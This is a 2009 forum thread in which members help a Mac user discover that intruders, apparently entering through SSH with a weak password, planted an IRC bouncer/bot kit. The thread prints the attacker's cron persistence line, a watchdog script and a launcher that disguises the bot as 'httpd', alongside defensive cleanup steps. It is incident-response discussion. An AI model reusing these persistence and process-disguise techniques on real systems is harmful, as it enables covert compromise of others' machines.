Unknown network traffic reported by little snitch

Discussion in 'macOS' started by Pimptastic, Feb 27, 2009.

  1. Pimptastic macrumors regular

    Pimptastic

    Joined:
    Nov 27, 2006
    Location:
    Up North, UK
    #1
    Just got home from work and Little Snitch is reporting that the following processes...

    sshd
    launchproxy
    Mac OS X kernal

    ...are pretty much constantly connecting to 78.107.128.250

    Looked at bit suspicious so i told Little Snitch to block all application from accessing that IP address, but it doesn't seem to have done anything. Little Snitch is still reporting those processes are accessing that IP

    If you type the IP address into firefox, it brings up a (Russian?) website.

    If i turn off Remote Sharing in System preferences, the connections disappear.

    I have tried changing my user password, but the connections still persist.

    Anyone have any ideas what that IP address relates to? And if so, how to stop it?

    Thanks
     
  2. ElectricSheep macrumors 6502

    ElectricSheep

    Joined:
    Feb 18, 2004
    Location:
    Wilmington, DE
    #2
    A few things...

    Open up Activity Monitor, and use the little pop-up menu to display All Processes, Hierarchically.

    Take a screen shot of all the entries listed there and post it here.

    Also, in a Terminal window, type the following command:

    sudo ps -ax

    And paste the output here.
     
  3. lostngone macrumors demi-god

    lostngone

    Joined:
    Aug 11, 2003
    Location:
    Anchorage
    #3
    Does your /var/log/system.log show anything and what shows up when you type the "last" or "w" command?

    Those can be easily tampered with if the system was compromised but it doesn't hurt to look...
     
  4. crazzyeddie macrumors 68030

    crazzyeddie

    Joined:
    Dec 7, 2002
    Location:
    Florida, USA
    #4
    Any chance you downloaded iWork '09 illegally when it came out?
     
  5. Pimptastic thread starter macrumors regular

    Pimptastic

    Joined:
    Nov 27, 2006
    Location:
    Up North, UK
    #5
    hi mate, here is the info you requested. I have turned remote login off for the time being. Pictures of Activity Monitor are attached

    Code:
      1 ??         0:05.27 /sbin/launchd
       10 ??         0:00.77 /usr/libexec/kextd
       11 ??         0:26.00 /usr/sbin/DirectoryService
       12 ??         0:04.64 /usr/sbin/notifyd
       13 ??         0:10.80 /usr/sbin/syslogd
       14 ??         0:25.29 /usr/sbin/configd
       15 ??         0:02.21 /usr/sbin/distnoted
       16 ??         0:03.65 /usr/sbin/mDNSResponder -launchd
       22 ??         0:06.11 /usr/sbin/securityd -i
       26 ??         0:06.40 /usr/sbin/ntpd -c /private/etc/ntp-restrict.conf -n -g
       27 ??         0:01.79 /usr/sbin/cupsd -l
       28 ??         0:00.79 /usr/sbin/cron
       29 ??         0:56.77 /usr/sbin/update
       30 ??         0:00.01 /sbin/SystemStarter
       34 ??         0:00.03 /System/Library/CoreServices/RemoteManagement/AppleVNC
       35 ??         3:32.09 /System/Library/Frameworks/CoreServices.framework/Fram
       36 ??         0:00.84 /System/Library/CoreServices/loginwindow.app/Contents/
       37 ??         0:00.01 /usr/sbin/KernelEventAgent
       38 ??         0:04.89 /usr/sbin/kdcmond -n -a
       40 ??         0:00.01 /usr/libexec/hidd
       41 ??         1:00.58 /System/Library/Frameworks/CoreServices.framework/Vers
       43 ??         0:00.01 /sbin/dynamic_pager -F /private/var/vm/swapfile
       46 ??         0:01.25 /usr/sbin/diskarbitrationd
       50 ??         0:00.22 /usr/sbin/blued
       51 ??         0:00.01 autofsd
       53 ??         0:01.81 /usr/libexec/ApplicationFirewall/socketfilterfw
       54 ??         0:00.20 /usr/local/sbin/dnsupdate daemon
       56 ??         0:00.02 /bin/sh /Library/Parallels/Parallels Service.app/Conte
       57 ??         0:01.39 /Library/Little Snitch/lsd
       73 ??         0:03.81 /System/Library/CoreServices/coreservicesd
       90 ??         0:00.04 /usr/sbin/krb5kdc -n -r LKDC:SHA1.38741A8FE8A8BB2B2C47
       91 ??        16:48.92 /System/Library/Frameworks/ApplicationServices.framewo
       97 ??         0:01.22 /usr/local/sbin/dyndnsd daemon
      106 ??         0:00.38 /usr/sbin/racoon -e -x
      109 ??         0:00.15 /Library/Application Support/VMware Fusion/vmnet-natd 
      142 ??         0:00.15 /Library/Application Support/VMware Fusion/vmnet-dhcpd
      146 ??         0:00.00 /Library/Application Support/VMware Fusion/vmnet-netif
      151 ??         0:00.00 /Library/Application Support/VMware Fusion/vmnet-netif
      156 ??         0:00.18 /Library/Application Support/VMware Fusion/vmnet-dhcpd
      157 ??         0:00.99 /sbin/launchd
      161 ??         0:00.00 /Library/Application Support/VMware Fusion/vmnet-bridg
      170 ??         0:06.77 /Library/Parallels/Parallels Service.app/Contents/MacO
      182 ??         0:59.42 /Library/Parallels/Parallels Service.app/Contents/MacO
      185 ??         0:00.44 /usr/sbin/coreaudiod
      203 ??         0:00.17 /Users/Mark/Library/Application Support/Plex/PlexHelpe
      204 ??         8:18.75 /Library/Little Snitch/Little Snitch Network Monitor.a
      205 ??         0:00.54 /Library/Little Snitch/Little Snitch UIAgent.app/Conte
      207 ??         0:00.13 /System/Library/CoreServices/AirPort Base Station Agen
      210 ??         0:00.14 /System/Library/CoreServices/RemoteManagement/ARDAgent
      212 ??         0:00.25 /System/Library/CoreServices/Spotlight.app/Contents/Ma
      213 ??         0:00.28 /usr/sbin/UserEventAgent -l Aqua
      214 ??         0:00.21 aped
      215 ??         0:00.00 /usr/sbin/pboard
      216 ??         0:00.09 /System/Library/CoreServices/RemoteManagement/AppleVNC
      217 ??         0:00.00 /System/Library/CoreServices/RemoteManagement/AppleVNC
      218 ??         0:08.12 /System/Library/Frameworks/ApplicationServices.framewo
      219 ??        11:53.15 /System/Library/CoreServices/Dock.app/Contents/MacOS/D
      220 ??        12:39.59 /System/Library/CoreServices/SystemUIServer.app/Conten
      221 ??         0:54.93 /System/Library/CoreServices/Finder.app/Contents/MacOS
      225 ??         0:06.20 /System/Library/CoreServices/Dock.app/Contents/Resourc
      238 ??         0:02.16 /usr/sbin/nmbd -F
      317 ??         0:00.01 /System/Library/Services/AppleSpell.service/Contents/M
    15387 ??         4:20.78 /Applications/Firefox.app/Contents/MacOS/firefox-bin -
    15523 ??         0:09.91 /System/Library/PrivateFrameworks/DiskImages.framework
    15524 ??         0:04.51 /System/Library/PrivateFrameworks/DiskImages.framework
    15528 ??         0:00.45 /System/Library/PrivateFrameworks/DiskImages.framework
    15542 ??         0:00.00 /System/Library/Frameworks/JavaVM.framework/Versions/A
    15605 ??         7:20.54 /Applications/ClamXav.app/Contents/MacOS/ClamXav -psn_
    15710 ??       105:16.68 /usr/local/clamXav/bin/clamscan --stdout -v -r -i --no
    17340 ??         0:00.37 /System/Library/Frameworks/CoreServices.framework/Fram
    18130 ??         0:00.25 /System/Library/Image Capture/Devices/PTPCamera.app/Co
    18134 ??         0:00.82 /System/Library/Image Capture/Support/Image Capture Ex
    18141 ??         0:00.89 /System/Library/Frameworks/CoreServices.framework/Fram
    18236 ??         0:05.01 /Applications/Mail.app/Contents/MacOS/Mail -psn_0_1061
    18243 ??         0:00.30 /System/Library/Frameworks/SyncServices.framework/Vers
    18245 ??         0:00.08 /usr/sbin/smbd -F
    18246 ??         0:00.00 /usr/sbin/smbd -F
    18259 ??         0:05.83 /Applications/Utilities/Activity Monitor.app/Contents/
    18260 ??         0:03.31 /Applications/Utilities/Activity Monitor.app/Contents/
    18283 ??         0:00.42 /System/Library/PrivateFrameworks/DiskImages.framework
    18310 ??         0:00.82 /Applications/Utilities/Terminal.app/Contents/MacOS/Te
    18339 ttys000    0:00.02 login -pf Mark
    18340 ttys000    0:00.01 -bash
    18351 ttys000    0:00.04 ps -ax
    
    I did cos i couldn't wait for my copy to arrive, but it didn't have the virus, i checked before installing, and after installing
     

    Attached Files:

  6. angelwatt Moderator emeritus

    angelwatt

    Joined:
    Aug 16, 2005
    Location:
    USA
  7. ElectricSheep macrumors 6502

    ElectricSheep

    Joined:
    Feb 18, 2004
    Location:
    Wilmington, DE
    #7
    You should probably check your crontabs.

    In the terminal:

    sudo cat /etc/crontab

    and for your user crontab:

    crontab -l

    Might as well check root's crontab:

    sudo crontab -l
     
  8. Pimptastic thread starter macrumors regular

    Pimptastic

    Joined:
    Nov 27, 2006
    Location:
    Up North, UK
    #8
    Only thing that came up was with the last command

    Code:
    * * * * * /var/root/.access.log/y2kupdate >/dev/null 2>&1
    Did you see anything suspicious in my previous post?
     
  9. ElectricSheep macrumors 6502

    ElectricSheep

    Joined:
    Feb 18, 2004
    Location:
    Wilmington, DE
    #9
    That entry should definitely NOT be there.

    First, change the permissions on that file so that it is no longer executable (You'll be working in the Terminal):

    sudo chmod a-x /var/root/.access.log/y2kupdate

    Next, you can either delete it, or move it to your home directory where you may examine it to see what its doing.

    To move:

    sudo mv /var/root/.access.log/y2kupdate /Users/Mark/malware

    View its contents:

    sudo cat /Users/Mark/malware

    To delete it right where it is:

    sudo rm /var/root/.access.log/y2kupdate

    And clean up your root's crontab file:

    sudo crontab -r

    When you have moved/deleted that file, you should verify that some other process is not attempting to recreate it. Wait a little while, and then run:

    ls /var/root/.access.log/
     
  10. Pimptastic thread starter macrumors regular

    Pimptastic

    Joined:
    Nov 27, 2006
    Location:
    Up North, UK
    #10
    Thanks for that, appreciate it.

    This is the content of that file. Any idea what it was?

    Code:
    iMac:~ Mark$ sudo cat /Users/Mark/malware
    #!/bin/sh
    if test -r /var/root/.access.log/psybnc.pid; then
    pid=$(cat /var/root/.access.log/psybnc.pid)
    if $(kill -CHLD $pid >/dev/null 2>&1)
    then
    exit 0
    fi
    fi
    cd /var/root/.access.log
    ./run &>/dev/null
    
     
  11. ElectricSheep macrumors 6502

    ElectricSheep

    Joined:
    Feb 18, 2004
    Location:
    Wilmington, DE
    #11
    You've got some more cleaning to do.

    In the terminal:

    cat /var/root/.access.log/psybnc.pid

    If you get output, it should be a number. You are going to feed this number to a command to examine the process its attached to:

    sudo ps -ax -p [number] -- replace [number] with the above output. Omit the braces.

    Also, check the contents of the following:

    sudo cat /var/root/.access.log/run
     
  12. Pimptastic thread starter macrumors regular

    Pimptastic

    Joined:
    Nov 27, 2006
    Location:
    Up North, UK
    #12
    Did the first command but get permission denied

    Code:
    iMac:~ Mark$ cat /var/root/.access.log/psybnc.pid
    cat: /var/root/.access.log/psybnc.pid: Permission denied
    
     
  13. ElectricSheep macrumors 6502

    ElectricSheep

    Joined:
    Feb 18, 2004
    Location:
    Wilmington, DE
    #13
    Another followup:

    If its available, you should examine the contents of your bash history:

    less ~/.bash_history (use the space page to scroll output one page at a time)
     
  14. ElectricSheep macrumors 6502

    ElectricSheep

    Joined:
    Feb 18, 2004
    Location:
    Wilmington, DE
    #14
    You'll need to prepend the cat command with sudo to gain elevated privileges.

    sudo cat /var/root/.access.log/psybnc.pid
     
  15. Pimptastic thread starter macrumors regular

    Pimptastic

    Joined:
    Nov 27, 2006
    Location:
    Up North, UK
    #15
    Just done that, nothing suspicious in there

    Code:
    iMac:~ Mark$ sudo cat /var/root/.access.log/psybnc.pid
    Password:
    cat: /var/root/.access.log/psybnc.pid: No such file or directory
    
     
  16. ElectricSheep macrumors 6502

    ElectricSheep

    Joined:
    Feb 18, 2004
    Location:
    Wilmington, DE
    #16
    Is there anything else in that /var/root/.access.log/ directory? You can see with an ls command.

    sudo ls -al /var/root/.access.log/
     
  17. Pimptastic thread starter macrumors regular

    Pimptastic

    Joined:
    Nov 27, 2006
    Location:
    Up North, UK
    #17
    Definately some suspicious stuff in there.

    There is something in there called f u c k (without spaces).. as you can see, the swear filter caught it below

    Code:
    iMac:~ Mark$ sudo ls -al /var/root/.access.log/
    total 608
    drwxr-xr-x   19 504   504       646 27 Feb 21:33 .
    drwxr-x---+  16 root  wheel     544  7 Jan 18:12 ..
    -rw-r--r--    1 504   504     33557 10 Mar  2004 README
    -rwxr-xr-x    1 504   504       320 31 May  2004 config
    -rw-------    1 504   504      1002 10 Mar  2004 config.h
    -rw-r--r--    1 root  504        58  3 Jan 11:35 cron.d
    -rwxr-xr-x    1 504   504       347 31 May  2004 ****
    drwxr-xr-x  245 504   504      8330 31 May  2002 help
    -rwxr-xr-x    1 504   504    202544 10 Mar  2004 httpd
    drwxr-xr-x    6 504   504       204 26 Jul  2004 lang
    -rw-r--r--    1 root  504       139 26 Dec 12:41 livezone
    -rw-r--r--    1 root  504        22  3 Jan 11:35 livezone.dir
    drwxr-xr-x    3 504   504       102  6 May  2004 log
    drwxr-xr-x    2 504   504        68  4 Jun  2004 motd
    -rwxr-xr-x    1 504   504     14306 13 Nov  2003 proc
    drwxr-xr-x   34 1001  admin    1156  3 Jan 11:34 pulamea
    -rwxr-xr-x    1 504   504        68  4 Jun  2004 run
    drwxr-xr-x    3 504   504       102 10 Mar  2004 scripts
    -rwxr--r--    1 504   504     21516 25 Sep  2002 xh
    
     
  18. ElectricSheep macrumors 6502

    ElectricSheep

    Joined:
    Feb 18, 2004
    Location:
    Wilmington, DE
    #18
    First, remove execution permissions from everything in that folder:

    sudo chmod -R a-x /var/root/.access.log/*

    Next, dump the contents of that "run" file:

    sudo cat /var/root/.access.log/run

    This is starting to look like you got "pwned", and someone may have dropped a rootkit into your system. If you had a weak password (a word in the dictionary, for example), someone could have easily cracked it when you had Remote Access enabled. From there, it would have been trivial to log into your system and download a *nix rootkit to set up your machine to act as a zombie on a bot net.
     
  19. Pimptastic thread starter macrumors regular

    Pimptastic

    Joined:
    Nov 27, 2006
    Location:
    Up North, UK
    #19
    Running the first command returns this message

    Code:
    iMac:~ Mark$ sudo chmod -R a-x /var/root/.access.log/*
    chmod: /var/root/.access.log/*: No such file or directory
    
    The content of that run file is

    Code:
    #!/bin/sh
    ./proc "/usr/local/apache/bin/httpd -DSSL" httpd livezone
    Yeah, looks like ive been hacked. My password it two words joined together with a number on the end.
     
  20. ElectricSheep macrumors 6502

    ElectricSheep

    Joined:
    Feb 18, 2004
    Location:
    Wilmington, DE
    #20
    My guess is that the httpd there is just a front end to spawn other processes that are tripping Little Snitch.

    If you can, package up this .access.log directory and send it to me. I'd like to do some digging through them so I can get a better idea what is going down on your machine.

    First, move that sucker to your home directory:

    sudo mv /var/root/.access.log /Users/Mark/bad_directory

    Next, change ownership on it so you can manipulate it:

    sudo chown -R Mark /Users/Mark/bad_directory

    Then, use the Finder to compress it and send me the resulting zip file. Either PM it to me as an attachment, or if you would like to email it to me I will PM you my email address.

    I also have AIM/iChat if that is more convenient for you.
     
  21. jw2002 macrumors 6502

    Joined:
    Feb 23, 2008
    #21
    This thread got me to wondering about my sister's mac. After doing a little digging, I discovered that a script kiddie got in and installed an energymech IRC robot 4 days ago. The machine had weak security: password same as username plus incoming ssh open. After cleaning up that mess, my sister is now using far stronger passwords and has unchecked all the sharing settings.
     
  22. crazzyeddie macrumors 68030

    crazzyeddie

    Joined:
    Dec 7, 2002
    Location:
    Florida, USA
    #22
    Where are most of these processes installed? Startup items?
     
  23. lostngone macrumors demi-god

    lostngone

    Joined:
    Aug 11, 2003
    Location:
    Anchorage
    #23
    Did you format and re-install?
    If you didn't the chances are good that they still own your sister's computer.
    Without running a checksum on every system file you will not know what files have been replaced. With a good rootkit they can hide almost anything.
     
  24. dmmcintyre3 macrumors 68020

    Joined:
    Mar 4, 2007
    #24
    I have a hardware firewall with no ports open and a completely random 128 bit length encryption code like password that nobody could remember by watching me type it.
     
  25. lostngone macrumors demi-god

    lostngone

    Joined:
    Aug 11, 2003
    Location:
    Anchorage
    #25
    They installed software on that computer! How hard would it have been to install a key logger along with the Bot(hint... not hard). You say you have no ports open, I will assume you mean no in-bound ports open, what happens if your box is the one opening the ports and sending out the data. Programs like Little Snitch do little if they have/had admin access into the system.

    You can not trust anything on that system. If they had root/admin access they can make it appear you have a clean system, all they do is replace programs like ls, ps, top, df, who, last, passwd, etc and replace them with their own that ignore the files and processes they are running, add a system log cleaner to cover their tracks and no one is the wiser...
     

Share This Page